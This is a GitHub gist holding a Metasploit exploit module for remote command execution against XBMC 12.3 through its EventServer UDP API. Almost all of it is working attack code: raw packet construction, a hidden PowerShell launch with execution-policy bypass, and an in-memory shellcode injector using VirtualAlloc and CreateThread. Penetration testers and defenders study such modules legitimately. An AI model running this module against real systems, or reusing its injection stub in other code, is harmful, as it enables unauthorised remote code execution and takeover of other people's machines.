Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created February 20, 2014 23:31
Show Gist options
  • Save phikshun/9125596 to your computer and use it in GitHub Desktop.
Save phikshun/9125596 to your computer and use it in GitHub Desktop.
XBMC EventServer API Metasploit Module
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'XBMC Remote UDP Code Exec',
'Description' => %q{
This module uses the XBMC remote API to run a command on the target server. For
Windows 7 and Windows 8, it can also be used to launch a Powershell-based direct
shellcode injection exploit.
Tested on XBMC 12.3 (Frodo).
},
'Author' =>
[ 'Phikshun' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14774 $',
'References' =>
[ [ 'URL', 'http://disconnected.io/2014/02/20/its-a-feature/' ], ],
'DefaultOptions' => { },
'Platform' => %w{ win unix },
'Targets' =>
[
[ 'Windows 7/8 x64', {
'Arch' => ARCH_X86,
'Platform' => 'win',
'Powershell' => "c:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"
} ],
[ 'Windows 7/8 x86', {
'Arch' => ARCH_X86,
'Platform' => 'win',
'Powershell' => "c:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe"
} ],
[ 'Windows CMD', {
'Arch' => ARCH_CMD,
'Platform' => 'win'
} ],
[ 'Unix CMD', {
'Arch' => ARCH_CMD,
'Platform' => 'unix'
} ]
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'It\'s a feature' ))
register_options([Opt::RPORT(9777)], self.class)
end
def exploit
connect_udp
if datastore['CMD']
print_status("Executing command #{datastore['CMD']}")
command = datastore['CMD']
else
print_status("Encoding shellcode with Powershell")
command = "#{target['Powershell']} -w hidden -nop -ep bypass -noexit -encodedCommand " +
Rex::Text.encode_base64(Rex::Text.to_unicode(generate_powershell))
end
print_status("Sending exploit")
build_xbmc_remote_messages(command).each do |pkt|
udp_sock.put(pkt)
print_status("Wrote UDP packet of length #{pkt.length}")
end
handler
disconnect_udp
5.times { select(nil, nil, nil, 1) }
end
def build_xbmc_remote_messages(cmd)
cmd = "\x01XBMC.system.exec(#{cmd})\x00"
messages = []
messages << hello_message
count = (cmd.length / 992) + 1
cmd.scan(/.{1,992}/m).each_with_index do |c,i|
messages << message_header((i > 0 ? 8 : 10), i+1, count, c.length) + c
end
messages << bye_message
messages
end
def hello_message
"\x58\x42\x4d\x43\x02\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
"\x0f\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x6d\x73" +
"\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
end
def bye_message
"\x58\x42\x4d\x43\x02\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\x00" +
"\x00\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
end
def message_header(type, seq, count, size)
header = "\x58\x42\x4d\x43\x02\x00"
header += [type].pack('n')
header += [seq].pack('N')
header += [count].pack('N')
header += [size].pack('n')
header += "\x52\xea\xc6\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
header
end
def generate_powershell
powershell = "$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment